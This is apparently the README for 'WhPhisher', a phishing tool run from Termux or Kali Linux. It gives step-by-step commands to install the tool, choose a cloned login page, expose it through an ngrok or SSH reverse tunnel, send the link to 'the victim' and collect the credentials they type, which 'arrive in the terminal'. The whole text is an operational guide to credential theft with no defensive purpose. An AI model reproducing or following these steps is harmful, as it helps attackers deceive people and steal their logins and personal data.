The best tool for phishing with the most famous pages updated.
Termux, Kali Linux and debian
To make this tool less likely to fail, it is advised to install the latest version of Termux, and the Termux API.
pkg install bash
pkg install git
git clone
cd WhPhisher
chmod +x *
Wait for them to be installed and automatically start WhPhisher :D
Choose the page and wait for the tunneling to start.
Open new session
cd NgrokWh
chmod +x
ngrok http 8080
Share the link that generated the victim :D
Now we return to the main session, and if someone put their data, they will appear there :D
-Demonstration images:
We open a new session
pkg install openssh -y
ssh -R 80:localhost:8080
Share the link that was generated :D
- The green covers personal information
- The yellow arrow points to the link to be shared
- The link you sent to the victim:
When the victim puts her credentials, they arrive in the terminal: